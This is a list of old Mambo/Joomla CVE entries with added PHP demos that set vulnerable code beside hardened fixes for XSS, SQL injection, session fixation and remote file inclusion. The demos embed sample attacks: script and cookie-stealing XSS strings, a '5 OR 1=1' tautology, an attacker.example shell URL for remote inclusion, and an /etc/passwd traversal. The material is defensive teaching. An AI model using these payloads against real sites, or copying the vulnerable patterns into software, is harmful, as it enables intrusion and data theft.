
CVE-2007-6455 – Mambo 4.6.2 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities
https://notcve.org/view.php?id=CVE-2007-6455
20 Dec 2007 — Multiple cross-site scripting (XSS) vulnerabilities in index.php in Mambo 4.6.2 allow remote attackers to inject arbitrary web script or HTML via the (1) Itemid parameter in a com_frontpage option and the (2) option parameter.
Reference: https://www.exploit-db.com/exploits/30899
CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

CVE-2007-5362 – Joomla! Component mosmedialite451 - Remote File Inclusion
https://notcve.org/view.php?id=CVE-2007-5362
11 Oct 2007 — Multiple PHP remote file inclusion vulnerabilities in the Avant-Garde Solutions MOSMedia Lite (com_mosmedia) 4.5.1 component for Mambo and Joomla! allow remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter to (1) credits.html.php, (2) info.html.php, (3) media.divs.php, (4) media.divs.js.php, (5) purchase.html.php, or (6) support.html.php in includes/. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Reference: https://www.exploit-db.com/exploits/4499
CWE-94: Improper Control of Generation of Code ('Code Injection')

CVE-2007-5177 – Mambo Component Mambads 1.5 - SQL Injection
https://notcve.org/view.php?id=CVE-2007-5177
03 Oct 2007 — SQL injection vulnerability in index.php in the MambAds (com_mambads) 1.5 and earlier component for Mambo allows remote attackers to execute arbitrary SQL commands via the caid parameter.
Reference: https://www.exploit-db.com/exploits/4469
CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

CVE-2007-4745
https://notcve.org/view.php?id=CVE-2007-4745
06 Sep 2007 — Multiple cross-site scripting (XSS) vulnerabilities in the AkoBook 3.42 and earlier component (com_akobook) for Mambo allow remote attackers to inject arbitrary web script or HTML via JavaScript events in the (1) gbmail and (2) gbpage parameters in the sign function.
Reference: http://osvdb.org/37533
CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
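Added example (PHP), not code from Mambo or AkoBook, covering the two XSS entries above (CVE-2007-6455 and CVE-2007-4745). It shows the reflection pattern both describe, a request parameter pasted into HTML, beside the output encoding that closes it. The parameter names Itemid, option and gbmail come from the advisories; the HTML fragments and the request values are constructed for the demo. The AkoBook entry is the attribute-context case (a quote closes the value attribute and a JavaScript event handler follows), which is why ENT_QUOTES is not optional.

```php
<?php
// Added illustration, not Mambo's or AkoBook's code. Templates below are invented.

// Vulnerable shape: request values are written straight into the HTML response.
function render_vulnerable(array $get): string
{
    $itemid = $get['Itemid'] ?? '';
    $gbmail = $get['gbmail'] ?? '';
    return '<a href="index.php?option=com_frontpage&Itemid=' . $itemid . '">Home</a>'
         . '<input name="gbmail" value="' . $gbmail . '">';
}

// Hardened shape: encode for the HTML context at the output point. ENT_QUOTES is
// what stops a double quote in gbmail from closing the value attribute so that an
// onmouseover= handler (the "JavaScript events" vector in CVE-2007-4745) can follow.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_hardened(array $get): string
{
    // Itemid is an integer by contract: enforce the type rather than encode garbage.
    $itemid = filter_var($get['Itemid'] ?? 0, FILTER_VALIDATE_INT, ['options' => ['min_range' => 0]]);
    if ($itemid === false) {
        $itemid = 0;
    }
    $gbmail = $get['gbmail'] ?? '';
    return '<a href="index.php?option=com_frontpage&amp;Itemid=' . $itemid . '">Home</a>'
         . '<input name="gbmail" value="' . h($gbmail) . '">';
}

// Constructed request: a script-bearing Itemid and an attribute-breaking gbmail.
$request = [
    'Itemid' => '1"><script>alert(1)</script>',
    'gbmail' => '" onmouseover="alert(document.cookie)',
];

echo "vulnerable: ", render_vulnerable($request), PHP_EOL;
echo "hardened:   ", render_hardened($request), PHP_EOL;
```

Run it with the PHP CLI. The vulnerable rendering emits the script tag and the event handler verbatim; the hardened rendering emits Itemid 0 (the payload fails integer validation) and the gbmail value with every quote and angle bracket entity-encoded, so it stays inside the attribute.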

CVE-2007-4505 – Mambo Component Remository - 'cat' SQL Injection
https://notcve.org/view.php?id=CVE-2007-4505
23 Aug 2007 — SQL injection vulnerability in index.php in the RemoSitory component (com_remository) for Mambo allows remote attackers to execute arbitrary SQL commands via the cat parameter in a selectcat action.
Reference: https://www.exploit-db.com/exploits/4306

CVE-2007-4456 – Mambo Component SimpleFAQ 2.11 - SQL Injection
https://notcve.org/view.php?id=CVE-2007-4456
21 Aug 2007 — SQL injection vulnerability in index.php in the SimpleFAQ (com_simplefaq) 2.11 component for Mambo allows remote attackers to execute arbitrary SQL commands via the aid parameter. NOTE: it was later reported that 2.40 is also affected, and that the component can be used in Joomla! in addition to Mambo.
Reference: https://www.exploit-db.com/exploits/4296
CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
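Added example (PHP), not the code of MambAds, RemoSitory or SimpleFAQ, covering the three SQL injection entries above (CVE-2007-5177 caid, CVE-2007-4505 cat, CVE-2007-4456 aid). All three share one shape: a numeric id from the request concatenated into the query string. The block reproduces that shape and the fix against an in-memory SQLite database through PDO (assumes the pdo_sqlite extension, present in standard PHP builds) so it runs offline; the table, column names and rows are invented for the demo.

```php
<?php
// Added illustration, not any Mambo component's code. Schema and rows are constructed.

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE ads (id INTEGER PRIMARY KEY, catid INTEGER, title TEXT, published INTEGER)');
$db->exec("INSERT INTO ads VALUES (1, 5, 'public ad', 1), (2, 7, 'other category', 1), (3, 5, 'unpublished draft', 0)");

// Vulnerable shape: the request value lands in the SQL text as-is.
function ads_vulnerable(PDO $db, string $caid): array
{
    $sql = "SELECT title FROM ads WHERE published = 1 AND catid = $caid";
    return $db->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// Hardened shape: validate the type at the boundary, then bind the typed value.
// Either step alone would stop this payload; doing both keeps the query text constant
// and rejects junk before it ever reaches the database.
function ads_hardened(PDO $db, string $caid): array
{
    $id = filter_var($caid, FILTER_VALIDATE_INT);
    if ($id === false) {
        return [];   // or raise; the point is that the raw string never reaches SQL
    }
    $stmt = $db->prepare('SELECT title FROM ads WHERE published = 1 AND catid = :caid');
    $stmt->bindValue(':caid', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// Constructed payload: a tautology that, because AND binds tighter than OR, turns the
// WHERE clause into (published = 1 AND catid = 5) OR 1=1 and returns every row.
$payload = '5 OR 1=1';

echo "vulnerable, normal input: "; print_r(ads_vulnerable($db, '5'));
echo "vulnerable, payload:      "; print_r(ads_vulnerable($db, $payload));
echo "hardened, payload:        "; print_r(ads_hardened($db, $payload));
echo "hardened, normal input:   "; print_r(ads_hardened($db, '5'));
```

With normal input both variants return the single published ad in category 5. With the payload the vulnerable query returns all three rows, including the unpublished draft and the other category, while the hardened version returns an empty list because the value fails integer validation before any SQL is built.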

CVE-2007-4203
https://notcve.org/view.php?id=CVE-2007-4203
08 Aug 2007 — Session fixation vulnerability in Mambo 4.6.2 CMS allows remote attackers to hijack web sessions by setting the Cookie parameter.
Reference: http://osvdb.org/42514
CWE-287: Improper Authentication
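Added example (PHP), not Mambo's session code, for the session fixation entry above. Fixation works because the application keeps using a session id the attacker planted in the victim's cookie before login, so the attacker already knows the id of the authenticated session. Two controls defeat it: refuse ids the server never issued (session.use_strict_mode, available from PHP 5.5.2) and rotate the id at the moment the session gains privilege (session_regenerate_id). The login function, the planted id and the user name are constructed for the demo; it assumes the PHP CLI with the default file session handler.

```php
<?php
// Added illustration, not Mambo's code. Scenario values are constructed.

function harden_session_config(): void
{
    ini_set('session.use_only_cookies', '1');  // ignore ids smuggled in the URL
    ini_set('session.use_strict_mode', '1');   // discard ids the save handler has never issued
    ini_set('session.cookie_httponly', '1');   // keep the cookie out of reach of injected script
}

// Call once credentials have been verified. Regenerating BEFORE writing privileged
// state means an id an attacker planted can never map to the authenticated session.
function login(string $user): string
{
    session_regenerate_id(true);   // true: delete the old record, so the planted id is dead
    $_SESSION['user'] = $user;
    $_SESSION['auth_at'] = time();
    return session_id();
}

// Constructed scenario: the attacker has already set the victim's session cookie.
$planted = 'attackerknowsthisid';
$results = [];

// 1. PHP defaults (no strict mode, no rotation): the planted id is accepted and would
//    remain the id of the logged-in session.
session_id($planted);
session_start();
$results['defaults accept planted id'] = session_id() === $planted;
session_destroy();   // also removes the record the handler just created for $planted

// 2. Hardened: strict mode replaces the unknown id at start, and login rotates it again.
harden_session_config();
session_id($planted);
session_start();
$beforeLogin = session_id();
$afterLogin = login('admin');
$results['strict mode kept planted id'] = $beforeLogin === $planted;
$results['login rotated the id'] = $afterLogin !== $beforeLogin;
session_write_close();

// Output is deferred to the end so nothing is written before session_start().
foreach ($results as $check => $value) {
    printf("%-30s %s\n", $check . ':', var_export($value, true));
}
```

Expected behaviour: the first check is true (defaults accept whatever id arrives), the second is false (strict mode issued a fresh id instead of the planted one), and the third is true (login rotated it again). Rotation on privilege change is the control to add even on older PHP without strict mode, because it does not depend on whether the planted id was accepted.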

CVE-2006-7202
https://notcve.org/view.php?id=CVE-2006-7202
09 May 2007 — The dofreePDF function in includes/pdf.php in Mambo 4.6.1 does not properly check access rights for database content, which allows remote attackers to read certain content via unspecified vectors.
Reference: http://secunia.com/advisories/25039

CVE-2007-2557
https://notcve.org/view.php?id=CVE-2007-2557
09 May 2007 — MOStlyDB Admin in Mambo 4.6.1 does not properly check privileges, which allows remote authenticated administrators to have an unknown impact via unspecified vectors. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Reference: http://osvdb.org/35540

CVE-2007-2317 – TOSMO/Mambo 1.4.13a - 'absolute_path' Remote File Inclusion
https://notcve.org/view.php?id=CVE-2007-2317
26 Apr 2007 — Multiple PHP remote file inclusion vulnerabilities in MiniBB Forum 1.5a and earlier, as used by TOSMO/Mambo 4.0.12 and probably other products, allow remote attackers to execute arbitrary PHP code via a URL in the absolute_path parameter to bb_plugins.php in (1) components/minibb/ or (2) components/com_minibb, or (3) configuration.php. NOTE: the com_minibb.php vector is already covered by CVE-2006-3690.
Reference: https://www.exploit-db.com/exploits/3707
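Added example (PHP), not MiniBB's or MOSMedia Lite's code, covering the two remote file inclusion entries on this page (CVE-2007-5362 mosConfig_absolute_path and CVE-2007-2317 absolute_path). Both have the same root cause: an include file that is reachable directly over HTTP builds its include path from a global variable that, with register_globals=On (the PHP default before 4.2 and still common in 2007 deployments; removed in PHP 5.4), is populated from the query string. The block shows the resulting include target beside a hardened form: a base path fixed at install time, an allow-list of includable files, and an existence check under that base. The file names are the ones listed in CVE-2007-5362; the attacker host, the temporary directory and the helper functions are constructed for the demo, and nothing is actually included.

```php
<?php
// Added illustration, not any Mambo component's code. Paths and hosts are constructed.

// Vulnerable shape. Under register_globals the assignment below is what PHP does for
// free from ?mosConfig_absolute_path=..., so a direct request to the include file turns
// the target into a URL. PHP then fetches and runs it when allow_url_fopen (PHP < 5.2)
// or allow_url_include (PHP >= 5.2) permits.
function vulnerable_include_target(array $request, string $file): string
{
    $mosConfig_absolute_path = $request['mosConfig_absolute_path'] ?? '';
    return $mosConfig_absolute_path . '/includes/' . $file;
}

// Hardened shape: the base never comes from the request, only known files are
// includable, and the resolved path must be an existing local file under the base.
// Mambo-era components additionally open with
//     defined('_VALID_MOS') or die('Direct Access to this location is not allowed.');
// so the file refuses to run unless the framework bootstrapped it (a convention, not
// from the CVE text). That guard is omitted here so the demo runs from the CLI.
function hardened_include_target(string $baseDir, string $file): string
{
    static $allowed = [
        'credits.html.php', 'info.html.php', 'media.divs.php',
        'media.divs.js.php', 'purchase.html.php', 'support.html.php',
    ];
    if (!in_array($file, $allowed, true)) {
        throw new InvalidArgumentException("refusing to include '$file'");
    }
    $base   = realpath($baseDir);
    $target = realpath($baseDir . '/includes/' . $file);  // false for URLs and missing files
    if ($base === false || $target === false || strpos($target, $base . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException("include target is not a local file under $baseDir");
    }
    return $target;
}

// Constructed install directory with one of the listed include files present.
$base = sys_get_temp_dir() . '/rfi_demo_' . getmypid();
mkdir($base . '/includes', 0700, true);
file_put_contents($base . '/includes/credits.html.php', "<?php echo 'credits';\n");

// Constructed hostile request: the base path is replaced with an attacker URL. The
// trailing '?' makes the server-side suffix part of the query string, so the attacker's
// file is fetched regardless of the '/includes/credits.html.php' the code appends.
$hostile = ['mosConfig_absolute_path' => 'http://attacker.example/shell.txt?'];

echo "vulnerable target: ", vulnerable_include_target($hostile, 'credits.html.php'), PHP_EOL;
echo "hardened target:   ", hardened_include_target($base, 'credits.html.php'), PHP_EOL;

foreach (['../../../etc/passwd', 'http://attacker.example/shell.txt'] as $bad) {
    try {
        hardened_include_target($base, $bad);
    } catch (Exception $e) {
        echo "hardened rejected: ", $e->getMessage(), PHP_EOL;
    }
}

// Clean up the constructed directory.
unlink($base . '/includes/credits.html.php');
rmdir($base . '/includes');
rmdir($base);
```

The vulnerable function prints the attacker URL with the component's own suffix appended after the '?', which is exactly the string the 2007 exploits fed to the affected files. The hardened function returns the resolved local path for the legitimate name and throws for the traversal and URL inputs, both of which fail the allow-list before realpath is even consulted. Turning register_globals off and allow_url_include off are the platform-level fixes; the code-level fix is to stop deriving include paths from anything a request can set.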